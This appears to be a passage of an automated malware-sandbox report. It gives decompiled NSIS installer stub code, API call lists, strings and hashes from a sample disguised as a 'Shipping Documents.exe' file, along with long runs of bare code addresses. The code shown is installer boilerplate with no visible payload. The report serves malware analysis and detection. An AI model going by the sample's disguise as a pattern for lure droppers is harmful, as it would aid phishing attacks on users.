                                          0x00406db7
                                          0x00406dbc
                                          0x00406df4
                                          0x00406df4
                                          0x00406df8
                                          0x00406e24
                                          0x00406e26
                                          0x00406e2d
                                          0x00406e30
                                          0x00406e33
                                          0x00406e33
                                          0x00406e38
                                          0x00406e38
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e44
                                          0x00406e47
                                          0x00406e74
                                          0x00406e74
                                          0x00406e77
                                          0x00406e7a
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00000000
                                          0x00406eee
                                          0x00406e7c
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8b
                                          0x00406e8e
                                          0x00406e91
                                          0x00406e94
                                          0x00406e97
                                          0x00406e9a
                                          0x00406e9d
                                          0x00406eb6
                                          0x00406eb8
                                          0x00406ebb
                                          0x00406ebc
                                          0x00406ebf
                                          0x00406ec1
                                          0x00406ec4
                                          0x00406ec6
                                          0x00406ec8
                                          0x00406ecb
                                          0x00406ecd
                                          0x00406ed0
                                          0x00406ed4
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed7
                                          0x00406eda
                                          0x00406edd
                                          0x00406e9f
                                          0x00406e9f
                                          0x00406ea7
                                          0x00406eac
                                          0x00406eae
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406ee0
                                          0x00406ee7
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00000000
                                          0x00406ee9
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee7
                                          0x00406dfa
                                          0x00406dfd
                                          0x00406dff
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0a
                                          0x00406e0d
                                          0x00406e10
                                          0x00406e10
                                          0x00406e13
                                          0x00406e13
                                          0x00406e16
                                          0x00406e1d
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00000000
                                          0x00406e1f
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1d
                                          0x00406da3
                                          0x00406da6
                                          0x00406da8
                                          0x00406dab
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406c95
                                          0x00406c95
                                          0x00406c99
                                          0x0040715f
                                          0x00000000
                                          0x0040715f
                                          0x00406c9f
                                          0x00406ca2
                                          0x00406ca5
                                          0x00406ca8
                                          0x00406caa
                                          0x00406caa
                                          0x00406caa
                                          0x00406cad
                                          0x00406cb0
                                          0x00406cb3
                                          0x00406cb6
                                          0x00406cb9
                                          0x00406cbc
                                          0x00406cbd
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cc2
                                          0x00406cc5
                                          0x00406cc8
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406cce
                                          0x00000000
                                          0x00000000
                                          0x00406f12
                                          0x00406f12
                                          0x00406f12
                                          0x00406f16
                                          0x00000000
                                          0x00000000
                                          0x00406f1c
                                          0x00406f1f
                                          0x00406f22
                                          0x00406f25
                                          0x00406f27
                                          0x00406f27
                                          0x00406f27
                                          0x00406f2a
                                          0x00406f2d
                                          0x00406f30
                                          0x00406f33
                                          0x00406f36
                                          0x00406f39
                                          0x00406f3a
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3f
                                          0x00406f42
                                          0x00406f45
                                          0x00406f48
                                          0x00406f4b
                                          0x00406f4f
                                          0x00406f51
                                          0x00406f54
                                          0x00000000
                                          0x00406f56
                                          0x00000000
                                          0x00406f56
                                          0x00406f54
                                          0x00407189
                                          0x00000000
                                          0x00000000
                                          0x004067b8

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                          • Instruction ID: 6d311f2402807b87ac493386ce59d8e56409eb9bb3693b5a24021ea98ba03221
                                          • Opcode Fuzzy Hash: 69107d409a21aceab355f2bdda7f7152adad7d75b4471f7616c4440fbc630a2e
                                          • Instruction Fuzzy Hash: 3AF18571D04229CBDF28CFA8C8946ADBBB1FF44305F25816ED456BB281D3786A86CF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040659C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040659C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225a0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225a0;
			}




                                          0x004065a7
                                          0x004065b0
                                          0x00000000
                                          0x004065bd
                                          0x004065b3
                                          0x00000000

                                          APIs
                                          • FindFirstFileA.KERNELBASE(73BCFA90,004225A0,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,00405CF1,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,00000000,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,C:\Users\user\AppData\Local\Temp\nszCE87.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560), ref: 004065A7
                                          • FindClose.KERNEL32(00000000), ref: 004065B3
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nszCE87.tmp, xrefs: 0040659C
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: C:\Users\user\AppData\Local\Temp\nszCE87.tmp
                                          • API String ID: 2295610775-2010284083
                                          • Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                          • Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
                                          • Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
                                          • Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403A3B, Relevance: 51.0, APIs: 14, Strings: 15, Instructions: 215stringregistryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E00403A3B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424754;
				_t17 = E00406631(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d50;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
					__eflags =  *0x420d50;
					if(__eflags == 0) {
						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406186("1033", _t67 & 0x0000ffff);
				}
				E00403D00(_t71, _t84);
				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x4247e0 =  *0x42475c & 0x00000020;
				 *0x4247fc = 0x10000;
				if(E00405CAE(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CAE(_t92, _t80) == 0) {
						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423f28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D00(_t71, __eflags);
							__eflags =  *0x424800;
							if( *0x424800 != 0) {
								_t28 = E00405421(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423f0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d30, 5);
							_t34 = E004065C3("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E004065C3("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423ee0);
								 *0x423f04 = _t81;
								RegisterClassA(0x423ee0);
							}
							_t36 =  *0x423f20; // 0x0
							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
							E0040398B(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424740;
						 *0x423ee4 = E00401000;
						 *0x423ef0 =  *0x424740;
						 *0x423ef4 = _t25;
						 *0x423f04 = 0x40a210;
						if(RegisterClassA(0x423ee0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236e0;
					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
					_t57 =  *0x4236e0; // 0x75
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236e1;
						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406228(_t80, E00405BC0(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C07(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}


























                                          0x00403a41
                                          0x00403a4a
                                          0x00403a51
                                          0x00403a53
                                          0x00403a67
                                          0x00403a79
                                          0x00403a80
                                          0x00403a87
                                          0x00403a8d
                                          0x00403a92
                                          0x00403a98
                                          0x00403aab
                                          0x00403aab
                                          0x00403ab6
                                          0x00403a55
                                          0x00403a55
                                          0x00403a60
                                          0x00403a60
                                          0x00403abb
                                          0x00403ac5
                                          0x00403ace
                                          0x00403ad3
                                          0x00403ae4
                                          0x00403b6b
                                          0x00403b73
                                          0x00403b7c
                                          0x00403b7c
                                          0x00403b92
                                          0x00403b98
                                          0x00403ba6
                                          0x00403c27
                                          0x00403c2f
                                          0x00403c39
                                          0x00403c3e
                                          0x00403c44
                                          0x00403cce
                                          0x00403cd3
                                          0x00403cd5
                                          0x00403cf1
                                          0x00000000
                                          0x00403cf1
                                          0x00403cd7
                                          0x00403cdd
                                          0x00403ce5
                                          0x00403ce5
                                          0x00000000
                                          0x00403cdd
                                          0x00403c52
                                          0x00403c5d
                                          0x00403c62
                                          0x00403c64
                                          0x00403c6b
                                          0x00403c6b
                                          0x00403c76
                                          0x00403c7e
                                          0x00403c80
                                          0x00403c82
                                          0x00403c8b
                                          0x00403c8e
                                          0x00403c94
                                          0x00403c94
                                          0x00403c9a
                                          0x00403cb3
                                          0x00403cc4
                                          0x00000000
                                          0x00403cc9
                                          0x00403c31
                                          0x00403c33
                                          0x00000000
                                          0x00403ba8
                                          0x00403ba8
                                          0x00403bb4
                                          0x00403bbe
                                          0x00403bc4
                                          0x00403bc9
                                          0x00403bd8
                                          0x00403cf6
                                          0x00403cf6
                                          0x00000000
                                          0x00403cf6
                                          0x00403be7
                                          0x00403c22
                                          0x00000000
                                          0x00403c22
                                          0x00403aea
                                          0x00403aea
                                          0x00403aed
                                          0x00403aef
                                          0x00000000
                                          0x00000000
                                          0x00403af9
                                          0x00403b09
                                          0x00403b0e
                                          0x00403b15
                                          0x00000000
                                          0x00000000
                                          0x00403b19
                                          0x00403b1b
                                          0x00403b28
                                          0x00403b28
                                          0x00403b30
                                          0x00403b36
                                          0x00403b5e
                                          0x00403b66
                                          0x00000000
                                          0x00403b48
                                          0x00403b49
                                          0x00403b52
                                          0x00403b58
                                          0x00403b59
                                          0x00000000
                                          0x00403b59
                                          0x00403b54
                                          0x00403b56
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403b56
                                          0x00403b36

                                          APIs
                                            • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                            • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?), ref: 0040665E
                                          • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,00000000), ref: 00403A55
                                            • Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193
                                          • lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,00000000), ref: 00403AB6
                                          • lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,73BCFA90), ref: 00403B2B
                                          • lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                          • GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
                                          • LoadImageA.USER32 ref: 00403B92
                                          • RegisterClassA.USER32 ref: 00403BCF
                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
                                          • CreateWindowExA.USER32 ref: 00403C1C
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403C52
                                          • GetClassInfoA.USER32 ref: 00403C7E
                                          • GetClassInfoA.USER32 ref: 00403C8B
                                          • RegisterClassA.USER32 ref: 00403C94
                                          • DialogBoxParamA.USER32 ref: 00403CB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed$>B
                                          • API String ID: 606308-387256093
                                          • Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                          • Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
                                          • Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
                                          • Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E00402EF1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x424750 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\202139769574 Shipping Documents.exe", 0x400);
				_t106 = E00405DC1("C:\\Users\\jones\\Desktop\\202139769574 Shipping Documents.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return "Error launching installer";
				}
				E00406228("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\202139769574 Shipping Documents.exe");
				E00406228(0x42c000, E00405C07("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x41f908 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E00402E52(1);
					__eflags =  *0x424758 - _t94;
					if( *0x424758 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t111 = GlobalAlloc(0x40, _v20);
						E00406756(0x40b870);
						E00405DF0( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403419( *0x424758 + 0x1c);
							 *0x41f90c = _t65;
							 *0x41f900 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403192(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x424754 = _t111;
								 *0x42475c =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x424760 =  *0x424760 + 1;
									__eflags =  *0x424760;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x41f8fc; // 0x31839
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00405D7C(0x424780, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403419( *0x41f8f8);
					_t77 = E00403403( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x424758) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E00403403(0x4178f8, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E52(1);
							L32:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x424758;
						if( *0x424758 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L20;
						}
						E00405D7C( &_v40, 0x4178f8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x41f8f8; // 0x0
						 *0x424800 =  *0x424800 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x424758 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x41f908; // 0x173c
						if(__eflags < 0) {
							_v8 = E004066E8(_v8, 0x4178f8, _t107);
						}
						 *0x41f8f8 =  *0x41f8f8 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                          0x00402efc
                                          0x00402eff
                                          0x00402f02
                                          0x00402f1c
                                          0x00402f21
                                          0x00402f34
                                          0x00402f39
                                          0x00402f3f
                                          0x00000000
                                          0x00402f41
                                          0x00402f52
                                          0x00402f63
                                          0x00402f6a
                                          0x00402f70
                                          0x00402f72
                                          0x00402f77
                                          0x00402f79
                                          0x00403064
                                          0x00403066
                                          0x0040306b
                                          0x00403072
                                          0x00000000
                                          0x00000000
                                          0x00403078
                                          0x0040307b
                                          0x004030a7
                                          0x004030b7
                                          0x004030b9
                                          0x004030ca
                                          0x004030e5
                                          0x004030eb
                                          0x004030ee
                                          0x004030f3
                                          0x00403112
                                          0x00403122
                                          0x00403134
                                          0x00403139
                                          0x0040313e
                                          0x00403141
                                          0x0040314a
                                          0x0040314e
                                          0x00403156
                                          0x0040315b
                                          0x0040315d
                                          0x0040315d
                                          0x0040315d
                                          0x00403165
                                          0x00403165
                                          0x00403168
                                          0x00403169
                                          0x00403169
                                          0x0040316c
                                          0x0040316e
                                          0x0040316e
                                          0x0040316e
                                          0x00403171
                                          0x00403178
                                          0x00403184
                                          0x00403189
                                          0x00000000
                                          0x00403189
                                          0x00000000
                                          0x00403141
                                          0x00000000
                                          0x004030f5
                                          0x00403083
                                          0x0040308e
                                          0x00403093
                                          0x00403095
                                          0x00000000
                                          0x00000000
                                          0x0040309e
                                          0x004030a1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402f7f
                                          0x00402f84
                                          0x00402f89
                                          0x00402f8d
                                          0x00402f94
                                          0x00402f99
                                          0x00402f9b
                                          0x00402f9d
                                          0x00402f9d
                                          0x00402fa1
                                          0x00402fa6
                                          0x00402fa8
                                          0x00403101
                                          0x00403143
                                          0x00000000
                                          0x00403143
                                          0x00402fae
                                          0x00402fb5
                                          0x00403031
                                          0x00403035
                                          0x00403039
                                          0x0040303e
                                          0x00000000
                                          0x00403035
                                          0x00402fbe
                                          0x00402fc3
                                          0x00402fc6
                                          0x00402fcb
                                          0x00000000
                                          0x00000000
                                          0x00402fcd
                                          0x00402fd4
                                          0x00000000
                                          0x00000000
                                          0x00402fd6
                                          0x00402fdd
                                          0x00000000
                                          0x00000000
                                          0x00402fdf
                                          0x00402fe6
                                          0x00000000
                                          0x00000000
                                          0x00402fe8
                                          0x00402fef
                                          0x00000000
                                          0x00000000
                                          0x00402ff1
                                          0x00402ff7
                                          0x00403000
                                          0x00403006
                                          0x00403009
                                          0x0040300b
                                          0x00403011
                                          0x00000000
                                          0x00000000
                                          0x00403017
                                          0x0040301b
                                          0x00403023
                                          0x00403023
                                          0x00403026
                                          0x00403029
                                          0x0040302b
                                          0x0040302d
                                          0x0040302d
                                          0x00000000
                                          0x0040302b
                                          0x0040301d
                                          0x00403021
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040303f
                                          0x0040303f
                                          0x00403045
                                          0x00403051
                                          0x00403051
                                          0x00403054
                                          0x0040305a
                                          0x0040305a
                                          0x0040305a
                                          0x00403062
                                          0x00403062
                                          0x00000000
                                          0x00403062

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00402F05
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,00000400), ref: 00402F21
                                            • Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,80000000,00000003), ref: 00405DC5
                                            • Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7
                                          • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,C:\Users\user\Desktop\202139769574 Shipping Documents.exe,80000000,00000003), ref: 00402F6A
                                          • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AC
                                          Strings
                                          • Null, xrefs: 00402FE8
                                          • C:\Users\user\Desktop\202139769574 Shipping Documents.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403143
                                          • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                          • Error launching installer, xrefs: 00402F41
                                          • Inst, xrefs: 00402FD6
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030C4
                                          • soft, xrefs: 00402FDF
                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030F5
                                          • "C:\Users\user\Desktop\202139769574 Shipping Documents.exe" , xrefs: 00402EF1
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
